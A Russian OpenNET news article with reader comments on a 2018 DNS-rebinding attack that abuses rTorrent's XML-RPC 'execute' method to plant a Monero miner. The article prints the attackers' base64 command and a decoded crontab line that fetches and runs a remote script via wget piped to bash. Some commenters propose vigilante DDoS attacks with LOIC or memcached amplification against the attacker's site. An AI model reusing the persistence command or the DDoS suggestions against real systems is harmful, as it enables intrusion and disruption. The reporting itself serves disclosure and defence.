The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

02.03.2018 11:37  Атака на системы с rTorrent для скрытого майнинга криптовалюты

Исследователи из компании F5 выявили волну атак на пользовательские системы, в которых запущен свободный консольный torrent-клиент rTorrent, использующий XML-RPC для взаимодействия с фронтэндами с реализацией интерфейсов пользователя.

Для выполнения своего кода в системе атакующие эксплуатируют особенность реализации XML-RPC в rTorrent, в которой не отключён метод "execute", позволяющий выполнить любой shell-код в системе. В ходе атаки в систему устанавливается собранный для unix-подобных систем инструментарий для майнинга криптовалюты Monero (XMR). На текущий момент на одном из связанных с атакой кошельков уже накопилось 13 XMR, что соответствует примерно 4200 долларам США.

Как и в случае с недавней уязвимостью в BitTorrent-клиенте Transmission, интерфейс XML-RPC в rTorrent доступен без аутентификации и включает команды, которые можно использовать для выполнения кода в системе. По умолчанию rTorrent принимает запросы только на внутреннем интерфейсе localhost (127.0.0.1), недоступном извне, поэтому для отправки команд атакующие применяют технику "DNS rebinding". Атака производится когда пользователь открывает в браузере подконтрольные злоумышленнику страницы на системе в которой также выполняется rTorrent.

Выполняемый в браузере JavaScript-код отправляет произвольный запрос на localhost через вызов XMLHttpRequest(). Для обхода защиты от выхода за пределы области текущего домена (cross-origin) используется метод смены имени хоста в DNS - на DNS-сервере атакующих настраивается поочерёдная отдача двух IP-адресов: на первый запрос отдаётся реальный IP сервера со страницей, а затем возвращается 127.0.0.1. Время жизни (TTL) для первого ответа выставляется в минимальное значение, поэтому при открытии страницы браузер определяет реальный IP сервера атакущего и загружает содержимое страницы. На странице запускается JavaScript-код, который ожидает истечения TTL и отправляет второй запрос, который теперь определяет хост как 127.0.0.1, что приводит к обращению к внутреннему сетевому интерфейсу компьютера пользователя без ограничений cross-origin.

Первым делом атакующие отправляют проверочный POST запрос с XML-RPC-методом "download_list". Если запрос обработан успешно, следом отправляется запрос "execute", в ходе которого на системе пользователя выполняется команда


   echo KGNy...tCg== |base64 -d|bash

которая после декодирования из формата base64 преоборазуется в


    (crontab -l 2>/dev/null|sed '/wget/d'; echo "5 * * * * wget -qO- lyzhenko.ru/.r|bash")|crontab –

Указанный код прописывает в crontab загрузку основного скрипта, который вначале пытается завершить процессы конкурирующих вредоносных систем майнинга, удаляя процессы по маскам "miner", "xmr", "wnTKYg", "imWBR" и "ddg", а также убивает все процессы sshd.

Далее устанавливается соединение со скрытым сервисом Tor c которого загружается непосредственно приложение для майнинга. Для доступа к Tor применяется шлюз Tor2Web, позволяющий обратиться к скрытому сервису без установки Tor при помощи обычного web-запроса.



  1. Главная ссылка к новости (https://f5.com/labs/articles/t...)
  2. OpenNews: Уязвимость в BitTorrent-клиенте Transmission, позволяющая выполнить код
  3. OpenNews: Релиз qBittorrent 4.0.0
  4. OpenNews: Проект Elementary OS представил BitTorrent-клиент Torrential
  5. OpenNews: Второй взлом инфраструктуры BitTorrent-клиента Transmission
  6. OpenNews: Релиз BitTorrent-клиента KTorrent 5.0
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: torrent, rtorrent
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Раскрыть все сообщения | RSS
 
  • 1.1, freehck (ok), 12:05, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]
  • +2 +/
    Увидел новость -- написал регистратору. Больше писем -- быстрее удалят. :)
     
     
  • 2.3, Аноним (-), 12:12, 02/03/2018 [^] [ответить]    [к модератору]
  • +6 +/
    Нужно хостеру писать, а не регистратору. Это типичный взломанный сайт с необновлённым WordPress или кривым плагином, на который файлик с payload залили. Таких тысячи.
     
     
  • 3.15, Аноним (-), 13:12, 02/03/2018 [^] [ответить]    [к модератору]
  • +2 +/
    Заметьте, как на этом сайте всё прекрасно и гармонично. CMS, заголовок, его орфография, наполнение и сабжевый скрипт.
     
     
  • 4.18, сайтостроитель (?), 13:16, 02/03/2018 [^] [ответить]     [к модератору]
  • +1 +/
    йа у мамы веб-девелопер и ничем не хуже владельцев мильена аналогичных сайтов-... весь текст скрыт [показать]
     
  • 4.38, sokoloff (??), 17:28, 02/03/2018 [^] [ответить]    [к модератору]  
  • +3 +/
    Это вы про 127.0.0.1? :)
     
     
  • 5.79, X4asd (ok), 14:54, 03/03/2018 [^] [ответить]    [к модератору]  
  • +3 +/
    > Это вы про 127.0.0.1? :)

    заходил сюда -- не плохой сайт

     
  • 3.20, freehck (ok), 13:38, 02/03/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    > Нужно хостеру писать, а не регистратору.

    Не один ли хрен?

     
  • 2.43, YetAnotherOnanym (ok), 19:18, 02/03/2018 [^] [ответить]     [к модератору]  
  • +/
    А они в ответ Дорогой сэр, Вы сами обнаружили у себя этот эксплойт, или Вам кт... весь текст скрыт [показать]
     
     
  • 3.48, Crazy Alex (ok), 21:50, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.
     
     
  • 4.53, freehck (ok), 22:26, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.

    Кстати, а почему бы и нет. Предлагаю начать лойс завтра в 11.

     
     
  • 5.62, Crazy Alex (ok), 04:16, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    По России? Ок
     
     
  • 6.68, freehck (ok), 11:21, 03/03/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    Я начал, если что.
     
     
  • 7.75, Аноним (-), 13:30, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > Я начал, если что.

    Главное следить чтобы 127.0.0.1 не досталось, с DNS rebinding то :)

     
  • 7.78, Аноним (-), 14:34, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > Я начал, если что.

    Напрашивается идея потестить https://www.opennet.ru/opennews/art.shtml?num=48161 на них. Но владельцы memcached'ов могут и не оценить :(

     
  • 4.74, Аноним (-), 13:22, 03/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    > Лично я, если этот сайт не ляжет до завтра, тупо заведу LOIC, чего и вам желаю.

    Ударим DDoS'ом по майнингу? А вы юмористы!!! :)

     
     
  • 5.80, YetAnotherOnanym (ok), 15:49, 03/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Тсссс! Не мешайте!
    Не забывайте, что в России уже третий месяц как год волонтёра идёт.
     
  • 5.81, Нанобот (ok), 19:13, 03/03/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    Запилите кто-нибудь новость "анонимы опеннета героически предотвратили атаку на rtorrent, задосив какой-то рандомный сайт в интернете"
     
  • 2.73, Аноним (-), 13:16, 03/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Зато по своему забавно Не успели написать новость про взлом трансмишна и отде... весь текст скрыт [показать]
     
     
  • 3.84, freehck (ok), 21:14, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Ну драпать на transmission смысла не много. У rtorrent основной режим работы -- консолньый, и он данной проблемой не затронут.
     
     
  • 4.86, Аноним (-), 04:39, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Лично я смысл в rtorrent вообще не понял На графическом десктопе гуй выглядит л... весь текст скрыт [показать]
     
     
  • 5.96, freehck (ok), 11:37, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    gt оверквотинг удален rtorrent ... весь текст скрыт [показать]
     
  • 5.103, scorry (ok), 21:27, 04/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > Лично я смысл в rtorrent вообще не понял

    Памяти ест меньше, позволяет больше торрентов качать-отдавать. Если я правильно понял ваш вопрос. конечно.

     
     
  • 6.108, Аноним (-), 08:19, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Трансмишн даже на роутере с 32 метрами по минимуму юзабелен На 64 грузит бочкам... весь текст скрыт [показать]
     
     
  • 7.116, scorry (ok), 11:05, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Я верю вашему опыту и уважаю вашу точку зрения Но, как пользовавший оба клиента... весь текст скрыт [показать]
     
     
  • 8.119, Аноним (-), 15:09, 09/03/2018 [^] [ответить]     [к модератору]  
  • +/
    У трансмишна настройки есть, знаете ли А чтобы АРГУМЕНТИРОВАННО заявлять надо н... весь текст скрыт [показать]
     
     
  • 9.122, scorry (ok), 15:34, 09/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Ох, юноша, да я же не собираюсь с вами спорить, ни в коем случае ... весь текст скрыт [показать]
     
     
  • 10.123, Аноним (-), 16:18, 09/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Ах, под аргументированно имелось в виду загибание пальцев и размахивание сакраль... весь текст скрыт [показать]
     
     
  • 11.125, scorry (ok), 02:08, 10/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Нет Трансмишн лучше, я не умею его готовить, а аноним всё знает лучше ... весь текст скрыт [показать]
     
     ....нить скрыта, показать (27)

  • 1.2, freehck (ok), 12:10, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +1 +/
    > В ходе атаки в систему устанавливается собранный для unix-подобных
    > систем инструментарий для майнинга криптовалюты Monero (XMR). На
    > текущий момент на одном из связанных с атакой кошельков уже накопилось
    > 13 XMR, что соответствует примерно 4200 долларам США.

    Кто-то за такие деньги 2 месяца пашет, а кракер заработал их своими мозгами и предприимчивостью.
    Можно конечно много размышлять, этично это или же нет, однако уж с чем точно нельзя поспорить, так это с тем, что парень смекалистый.

     
     
  • 2.4, Аноним (-), 12:20, 02/03/2018 [^] [ответить]    [к модератору]  
  • +5 +/
    То что он смекалистый опровергает последняя строка кода с chmod.

    И вообще, смекалистым он бы был если бы придумал что-то новое, а не воспосльзовался наработками других людей.

     
     
  • 3.12, Аноним (12), 12:57, 02/03/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    > И вообще, смекалистым он бы был если бы придумал что-то новое, а не воспосльзовался наработками других людей.

    А может он намеренно косит под дурачка, чтоб его не нашли. :)

     
  • 3.14, имя (?), 13:01, 02/03/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    в чем проблема с chmod? добавляет права на выполнение, запускает и затем удаляет файл
     
     
  • 4.42, RM (?), 19:10, 02/03/2018 [^] [ответить]    [к модератору]  
  • +6 +/
    Я так понимаю что продвинутые админы монтируют /tmp с noexec, вот это и есть проблема конкретного chmod
     
     
  • 5.49, Crazy Alex (ok), 21:51, 02/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Так то продвинутые
     
  • 2.16, Аноним (-), 13:13, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > Можно конечно много размышлять, этично это или же нет, однако уж с
    > чем точно нельзя поспорить, так это с тем, что парень смекалистый.

    Смекалистый не спалился бы.

     
     
  • 3.77, Аноним (-), 14:31, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > Смекалистый не спалился бы.

    Так спалился всего лишь какой-то бот. Если бы спалился владелец - он бы уже ожидал вызова в суд наверное, но про это в новости не говорится вроде.

     
  • 2.19, Iaaa (ok), 13:19, 02/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Кто-то за такие деньги 2 месяца пашет, а взломщик вор, бандит, громила, разводи... весь текст скрыт [показать]
     
     
  • 3.39, Аноним (-), 18:51, 02/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Вор бандит громила - хз что это разводила такую сложную схему за всю жизнь не ... весь текст скрыт [показать]
     
     
  • 4.61, angra (ok), 02:25, 03/03/2018 [^] [ответить]     [к модератору]  
  • +3 +/
    То есть для тебя тоже вопрос не в этике, а в сложности Ну так здесь ведь тоже п... весь текст скрыт [показать]
     
     
  • 5.66, Аноним (-), 10:31, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    И чем же схема "разбить окно и вытащить все ценное" сложнее чем схема в топике? Вопрос этики и вопрос сложности - разные вещи, не сваливай все в одну кучу.
     
     
  • 6.70, angra (ok), 12:10, 03/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Ну ты попробуй, а потом на зоне тебе объяснят, в чем ты ошибся. Или ты про ключевой момент "как сделать так, чтобы потом не сесть за это" вообще не подумал?
     
  • 5.87, Аноним (-), 10:20, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    И в этом тоже К тому же сложным и казалось бы криминальным начинаниям часто нах... весь текст скрыт [показать]
     
  • 2.28, Ю.Т. (?), 15:04, 02/03/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    Распотешил момент насчёт прибития конкурентных майнилок ... весь текст скрыт [показать]
     
  • 2.60, angra (ok), 02:16, 03/03/2018 [^] [ответить]     [к модератору]  
  • +4 +/
    В большинстве мест, где я работал сисадмином, у меня была возможность проявить ... весь текст скрыт [показать]
     
     
  • 3.64, freehck (ok), 10:13, 03/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Не, ну у нас-то по работе ресурс уже готовый -- бери и пользуйся А этот парнишк... весь текст скрыт [показать]
     
     
     
    Часть нити удалена модератором

  • 5.83, freehck (ok), 21:08, 03/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Надо же, коммуняжки пожаловали Угу А мир у нас чётко делится на чёрное и бе... весь текст скрыт [показать]
     
     
  • 6.85, angra (ok), 23:25, 03/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Я был студентом в другом городе в 90-е, на месяц у меня из финансов было около ... весь текст скрыт [показать]
     
     
  • 7.88, Аноним (-), 10:24, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    С другой стороны это уменьшает число дырявых сайтиков С которых могли бы и ддос... весь текст скрыт [показать]
     
  • 7.104, freehck (ok), 15:07, 05/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Ну хз, я был студентом в конце нулевых, и на 2000 деревянных в месяц при 100 й з... весь текст скрыт [показать]
     
  • 7.105, freehck (ok), 16:06, 05/03/2018 [^] [ответить]     [к модератору]  
  • +/
    А вот мимо этого так же просто, как и мимо остального, пройти уже просто невозмо... весь текст скрыт [показать]
     
     
  • 8.109, Аноним (-), 08:27, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Офигенный опус мыслящего человкеа Возможно, им больше нравится протирать штаны ... весь текст скрыт [показать]
     
     
  • 9.110, Ю.Т. (?), 08:34, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Ладно, ладно Ни чудес, ни сверхчеловеков не бывает А поскольку энтропию убить ... весь текст скрыт [показать]
     
     
  • 10.111, Аноним (-), 09:10, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Зато бывают лохи-по-жизни догадайтесь на кого я намекаю и те кто ими беспринци... весь текст скрыт [показать]
     
     
  • 11.117, Ю.Т. (?), 16:29, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Недочеловеков тоже не бывает Да какое-такое назидание Должны быть в таком ви... весь текст скрыт [показать]
     
     
  • 12.120, Аноним (-), 15:25, 09/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Мне бы хотелось так думать, и к этому надо стремиться наверное Но когда кем-то ... весь текст скрыт [показать]
     
  • 6.97, Аноним (-), 11:43, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Лично я знаю, что студенческий проездной стоит копейки, и каждый день рисковать ... весь текст скрыт [показать]
     
     
  • 7.115, Аноним (-), 09:48, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Он стоит копейки по меркам нормального человека Который может профитом заняться... весь текст скрыт [показать]
     
  • 6.99, Ю.Т. (?), 11:57, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Поздравляю, вы только что переоткрыли относительный классовый характер морали,... весь текст скрыт [показать]
     
     
  • 7.112, Аноним (-), 09:15, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Ваша же высокая мораль обычно сводится к тому, чтобы сидя в гадюшне с голым задо... весь текст скрыт [показать]
     
     
  • 8.118, Ю.Т. (?), 16:32, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Причём здесь наша высокая мораль Поскипанное -- ваша проекция ... весь текст скрыт [показать]
     
     
  • 9.121, Аноним (-), 15:31, 09/03/2018 [^] [ответить]     [к модератору]  
  • +/
    При чем Практика показала что обычно это сводится к чему-то такому Высокие иде... весь текст скрыт [показать]
     
     
  • 10.124, Ю.Т. (?), 16:28, 09/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Практика Но вы это всё только по худ литературе и знаете А наукой доказано ... весь текст скрыт [показать]
     
  • 4.72, Fedd (?), 13:13, 03/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Спорю ребята из project-zero идейку подсказали https://bugs.chromium.org/p/project-zero/issues/detail?id=1524
     
  • 2.76, Аноним (-), 13:34, 03/03/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    А еще менее смекалистые за столько могут и год-два пахать Да еще таская какие-н... весь текст скрыт [показать]
     
     ....нить скрыта, показать (35)

  • 1.5, anonymous (??), 12:26, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    охренеть. какой ... такое проектировал?
     
     
  • 2.7, IB (?), 12:33, 02/03/2018 [^] [ответить]    [к модератору]  
  • +5 +/
    В смысле кто проектировал такой DNS?

    Знают, борются, но legacy.

    С какого перепугу локально работающее приложение на localhost должно защищаться от внешних! атак.

     
     
  • 3.29, Аноним (-), 15:08, 02/03/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    С такого перепугу, что эти атаки не вчера придумали.
     
  • 3.54, Аноним (-), 22:38, 02/03/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    с какого перепугу докальное приложение испаользует сетевые порты а не Unix Domai... весь текст скрыт [показать]
     
     
  • 4.58, Аноним (-), 23:38, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    По умолчанию оно ни то, ни другое не использует, порты и unix-сокеты открываются специальной директивой в конфиге.

     
  • 3.89, Аноним (-), 10:25, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    С такого что внезапно вебпага в браузере может взять да и попросить localhost И... весь текст скрыт [показать]
     
  • 1.6, Яйцассыром (?), 12:33, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –2 +/
    >> а также убивает все процессы sshd.

    Подскажите, с каких это пор, в этих наших линуксах, кто-попало может кильнуть процесс запущенный от другого пользователя?

     
     
  • 2.8, Аноним (-), 12:40, 02/03/2018 [^] [ответить]    [к модератору]  
  • +3 +/
    Ну ты попробуй прибей обычным юзером sshd от рута запущенный, потом расскажи об успехах.
     
  • 2.10, imho (?), 12:46, 02/03/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    А кто сказал что он чужие убивает?
     
     
  • 3.17, нах (?), 13:13, 02/03/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    ну как бы редко sshd запускают от юзера, лазящего по порносайтам...

    хотя...

     
  • 2.11, Аноним (-), 12:56, 02/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Если кто-то уже вломился в систему, то скорее всего под тем же юзером. А если нет — ну что ж, не судьба, придётся конкурировать за процессор.
     
  • 1.13, Аноним (-), 12:57, 02/03/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • –1 +/
    т е если rtorrent висит на отдельном компе, бояться нечего еще и запущен под ю... весь текст скрыт [показать]
     
     
  • 2.21, Аноним (-), 13:52, 02/03/2018 [^] [ответить]     [к модератору]  
  • –3 +/
    Что там исправлять По умолчанию xmlrpc-интерфейс выключен Если кто-то его вклю... весь текст скрыт [показать]
     
     
  • 3.27, нах (?), 14:42, 02/03/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    авторизацию и transmission туда же Кстати, зачем вообще какому-то торренту ум... весь текст скрыт [показать]
     
     
  • 4.35, Аноним (-), 15:59, 02/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    > (уныло глядит на многоголовый xeon... 300 хешей максимум. Ну и чего их вот ломать?)

    Курочка по зёрнышку клюёт. Вот эта на 4200$ наклевала, может и ещё успеет, пока все спохватятся.

     
  • 4.56, Аноним (-), 23:32, 02/03/2018 [^] [ответить]     [к модератору]  
  • +2 +/
    Там она не предусмотрена, для авторизации предписывается использовать функционал... весь текст скрыт [показать]
     
     
  • 5.57, Аноним (-), 23:34, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > записанный .bashrc

    Или .ssh/authorized_keys.

     
  • 5.95, Аноним (-), 10:44, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Офигенное оправдание api без авторизации Знаете, если RPC api в результате може... весь текст скрыт [показать]
     
     
  • 6.100, Аноним (-), 16:11, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Может быть, ещё в bash сделать авторизацию при запуске интерактивной сессии Или... весь текст скрыт [показать]
     
     
  • 7.113, Аноним (-), 09:33, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Если внешняя страница в браузере сможет вызывать bash угодным ей образом - то та... весь текст скрыт [показать]
     
  • 4.90, Аноним (-), 10:29, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Без стремных RPC жизнь скучна В трансмишне exec не было, но была настройка выпо... весь текст скрыт [показать]
     
  • 2.22, Аноним (-), 13:52, 02/03/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    А что ты собрался тут исправлять Все работает так, как мы надизайнили ц Тут ... весь текст скрыт [показать]
     
     ....нить скрыта, показать (10)

  • 1.23, Аноним (-), 14:14, 02/03/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • +4 +/
    ну вот, раньше вирусы на дисках место освобождали, сжимая и распаковывая програм... весь текст скрыт [показать]
     
  • 1.25, Аноним (-), 14:26, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    Дожили
    конкурирующие вредоносные системы майнинга
    на компе подцепить можно

     
     
  • 2.41, Диалектик (?), 19:05, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Воспринимай это как новый виток борьбы за безопасность ПО на машинах пользователей, кстати подкреплённый финансовым интересом, а значит крайне эффективный виток!
     
  • 2.50, Crazy Alex (ok), 22:18, 02/03/2018 [^] [ответить]    [к модератору]  
  • +4 +/
    Вирусы друг друга в винде, помнится, тоже выносили
     
     
  • 3.67, ПупкинВасуасилий (?), 11:20, 03/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Не помню такого, чтобы выносили. Черви, после заражения, которые в системе дыру патчили, были. А чтобы выносили друг друга не помню.
     
  • 3.91, Аноним (-), 10:32, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Да и на всяких роутерах вирусы друг друга зачастую выпихивают, чтобы конкурент м... весь текст скрыт [показать]
     
  • 1.26, Аноним (-), 14:39, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    А если использовать в network.scgi.open_port произвольный порт, вместо обычного 5000, поможет защититься?
     
     
  • 2.51, Crazy Alex (ok), 22:19, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    Почти наверняка
     
  • 2.82, Аноним (-), 20:35, 03/03/2018 [^] [ответить]    [к модератору]  
  • +/
    хотя нет, запрос идет не напрямую к rtorrent, поэтому  нужно поменять на хост, отличный от localhost  и/или путь /RPC2
     
  • 1.30, iZEN (ok), 15:10, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –5 +/
    А если просто не устанавливать и не использовать bash?
     
     
  • 2.32, Аноним (-), 15:44, 02/03/2018 [^] [ответить]    [к модератору]  
  • +3 +/
    Автор заменит в скрипте bash на sh. Удачи в его выкидывании.
     
     
  • 3.47, iZEN (ok), 21:48, 02/03/2018 [^] [ответить]    [к модератору]  
  • –5 +/
    Думаете, автор догадается, что башизмы не везде работают?
     
     
  • 4.55, Аноним (-), 23:25, 02/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Там башизмов почти что нет, а что есть — не критично. Майнера всяко запустит.
     
  • 2.59, Led (ok), 00:55, 03/03/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    > А если просто не устанавливать и не использовать bash?

    Тебя маководы за это того... своим сделают.

     
  • 2.94, Аноним (-), 10:38, 04/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    > А если просто не устанавливать и не использовать bash?

    По-моему со сменой порта или авторизацией идея умнее разика так в три.

     
     
  • 3.98, Аноним (-), 11:51, 04/03/2018 [^] [ответить]    [к модератору]  
  • +/
    >> А если просто не устанавливать и не использовать bash?
    > По-моему со сменой порта или авторизацией идея умнее разика так в три.

    Со сменой порта — точно иакая же глупая.

     
     
  • 4.114, Аноним (-), 09:39, 07/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Это в теории А на практике делать портскан через DNS rebinding очень напряжно и... весь текст скрыт [показать]
     
  • 2.101, Michael Shigorin (ok), 16:54, 04/03/2018 [^] [ответить]    [к модератору]  
  • –2 +/
    > А если просто не устанавливать и не использовать bash?

    Предпочитаете tcsh.exe?

     
     
  • 3.102, Аноним (-), 20:41, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    sh причем именно отдельный, а не алиас на ash Хотя, в контексте новости - все ... весь текст скрыт [показать]
     
  • 3.106, ыы (?), 21:38, 05/03/2018 [^] [ответить]    [к модератору]  
  • +/
    cmd
     
  • 1.34, Ващенаглухо (ok), 15:51, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    Что за хрень?, rtorrent запущен, но не открывает он портов на 127.1
     
     
  • 2.36, Аноним (-), 16:08, 02/03/2018 [^] [ответить]    [к модератору]  
  • +/
    он открывает на том что написано в scgi.open_port, если там localhost, а в /etc/hosts последний Localhost ::1, будет только на нем
     
  • 1.40, Аноним (-), 18:56, 02/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –2 +/
    рторрент настолько гибкий и настраиваемый, что там веб морда накол не нужна.
     
     
  • 2.44, YetAnotherOnanym (ok), 19:26, 02/03/2018 [^] [ответить]     [к модератору]  
  • +/
    Щас прибежит юное модное дарование и объяснит тебе, что CLI - это настолько поза... весь текст скрыт [показать]
     
     
  • 3.45, Аноним (-), 19:37, 02/03/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    И правда, зачем учиться говорить, если можно обходиться жестами?
     
  • 3.46, VimCoder (?), 19:41, 02/03/2018 [^] [ответить]    [к модератору]  
  • –2 +/
    Программист не человек?
     
  • 2.52, Crazy Alex (ok), 22:22, 02/03/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Была бы не нужна, если б умел сортировку закачек Нет, не 1 6, а по размеру, н... весь текст скрыт [показать]
     
  • 2.93, Аноним (-), 10:36, 04/03/2018 [^] [ответить]     [к модератору]  
  • +/
    А еще она дико тормозит и в ней решительно невозможно понять что вообще клиент д... весь текст скрыт [показать]
     
  • 1.69, Аноним (-), 11:31, 03/03/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Если реализация такая кривая, можно ли украсть намайненое? Хотя бы часть?
     
     
  • 2.92, Аноним (-), 10:34, 04/03/2018 [^] [ответить]    [к модератору]  
  • +/
    > Если реализация такая кривая, можно ли украсть намайненое? Хотя бы часть?

    Замени кошель на свой и перезапусти? И пусть себе майнит дальше :)

     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor